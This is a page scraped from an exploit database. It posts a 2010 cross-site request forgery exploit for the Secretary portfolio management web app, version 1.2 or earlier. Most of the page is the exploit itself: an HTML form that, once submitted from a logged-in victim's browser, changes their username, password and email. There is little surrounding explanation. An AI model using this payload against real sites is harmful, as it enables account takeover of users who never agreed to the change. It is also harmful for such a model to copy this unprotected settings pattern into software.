Home / os / win7

[webapps / 0day] - Secretary <= 1.2 CSRF Remote User Sett

Posted on 03 November 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Secretary &lt;= 1.2 CSRF Remote User Settings Change | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Secretary &lt;= 1.2 CSRF Remote User Settings Change by giudinvx in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================================= Secretary &lt;= 1.2 CSRF Remote User Settings Change ================================================= Author___: giudinvx Email____: &lt;giudinvx[at]gmail[dot]com&gt; Date_____: 3/11/2010 Site_____: http://www.giudinvx.altervista.org/ -------------------------------------------------------- Application Info: THE SECRETARY A portfolio management system for designers. Version 2.1 / March 1 2009 www.thesecretary.org -------------------------------------------------------- ==============[[ -Exploit Code- ]]============== &lt;html&gt; &lt;form method=&quot;post&quot; action=&quot;[path]/secretary/?cubicle=home-settings&quot;&gt; &lt;input type=&quot;text&quot; value=&quot;xxx&quot; id=&quot;username&quot; name=&quot;username&quot;&gt; &lt;input type=&quot;text&quot; value=&quot;xxx&quot; id=&quot;display_name&quot; name=&quot;display_name&quot;&gt; &lt;input type=&quot;password&quot; id=&quot;xxx&quot; name=&quot;password&quot;&gt; &lt;input type=&quot;password&quot; id=&quot;xxx&quot; name=&quot;password_conf&quot;&gt; &lt;input type=&quot;text&quot; value=&quot;xxx@youremai.com&quot; id=&quot;email&quot; name=&quot;email&quot;&gt; &lt;button value=&quot;save&quot; id=&quot;submit&quot; name=&quot;submit&quot; type=&quot;submit&quot;&gt;Save&lt;/button&gt; &lt;/form&gt; &lt;/html&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-11-03]</pre></body></html>

 

TOP